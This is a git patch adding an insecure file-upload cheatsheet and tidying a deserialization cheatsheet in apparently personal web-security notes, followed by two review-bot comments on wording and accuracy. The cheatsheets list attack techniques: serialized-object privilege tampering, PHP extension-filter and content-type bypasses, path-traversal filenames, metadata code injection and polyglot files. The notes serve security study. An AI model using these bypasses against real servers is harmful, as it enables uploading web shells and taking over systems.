From c2ccb4ef3f3d778946b7cbbd64c2fb2afcc316a3 Mon Sep 17 00:00:00 2001 From: xanhacks Date: Tue, 13 Dec 2022 14:25:47 +0100 Subject: [PATCH] add file upload --- docs/web/deserialization.md | 5 ++--- docs/web/file-upload.md | 20 ++++++++++++++++++++ 2 files changed, 22 insertions(+), 3 deletions(-) create mode 100644 docs/web/file-upload.md diff --git a/docs/web/deserialization.md b/docs/web/deserialization.md index 7e31a45..0ce54ff 100644 --- a/docs/web/deserialization.md +++ b/docs/web/deserialization.md @@ -11,9 +11,8 @@ description: Insecure deserialization cheatsheet ## Cheatsheet -Java serialize : `0xACED` or `rO0` (base64) -Ruby serialize : `\x04\bo:\vUser` - +- Java serialize : `0xACED` or `rO0` (base64) +- Ruby serialize : `\x04\bo:\vUser` - Modify PHP attribute `O:4:"User":2:{s:8:"username";s:6:"carlos";s:7:"isAdmin";b:0;}` to `b:1` - Change data type for low comparaison bypass `0 == "Example string" // true` - Replace `avatar` path in your cookie and delete your account, the file will be delete diff --git a/docs/web/file-upload.md b/docs/web/file-upload.md new file mode 100644 index 0000000..11be87e --- /dev/null +++ b/docs/web/file-upload.md 
@@ -0,0 +1,20 @@ +# Insecure File upload + +## Definition + +**Insecure file upload** refers to a vulnerability in a computer system that allows unauthorized users to upload files to the system. This can be a serious security risk because it can allow attackers to upload malicious files, such as viruses or malware, that can compromise the security of the system. To prevent insecure file uploads, it is important to implement appropriate security measures, such as file type restrictions and authentication checks, to ensure that only authorized users are able to upload files. + +## Cheathsheet + +- Upload basic php file +- Change PHP content type to `Content-Type: image/jpeg` +- Path traversal in filename `../read_carlos_secret.php` or `..%2Fread_carlos_secret.php` +- Bypass PHP file extension filter `php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, ...` +- Other bypass `.pHp, .png.php`, `.php%00.png`, ... +- Add PHP in image metadata : `exiftool -Comment='' toto.png.php` +- Uploading files using PUT +- Polyglot file [PHAR/JPEG generator](https://gitlab.com/xanhacks/phar-jpg-polyglot/) + +## References + +- [PortSwigger - File upload](https://portswigger.net/web-security/file-upload) \ No newline at end of file
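Review bot: in the `docs/web/deserialization.md` hunk, the two lines you turn into list items keep a space before the colon (`Java serialize :`, `Ruby serialize :`) while the items below them use none, and since you are already touching this block it is worth fixing the adjacent context lines too: `low comparaison bypass` should read `loose comparison bypass` (PHP's `==` is "loose" comparison), and `the file will be delete` should be `the file will be deleted`. One caveat worth adding to the `0 == "Example string" // true` item: that result only holds on PHP 7 and earlier; PHP 8 changed string-to-number comparison so that `0 == "Example string"` is `false`, so note the version the trick applies to.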
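Review bot: the Definition paragraph in the new `docs/web/file-upload.md` describes the wrong problem: it frames insecure file upload as "unauthorized users" being able to upload, but every item in the cheatsheet below (content-type spoofing, extension filter bypass, path traversal in the filename, polyglots) is performed by a user who is allowed to upload and works because the server does not validate the file's name, extension, type, contents or size. Reword the definition around missing server-side validation rather than authentication, and keep the remediation sentence consistent with that. Smaller points in the same hunk: `## Cheathsheet` is a typo for `## Cheatsheet` (the heading used in `deserialization.md`); `.phps` appears twice in the extension list and `php` is the only entry without a leading dot; `exiftool -Comment='' toto.png.php` has an empty comment, so the command as written embeds nothing, and the PHP code you want executed has to go between the quotes; and the file is committed without a trailing newline (`\ No newline at end of file`).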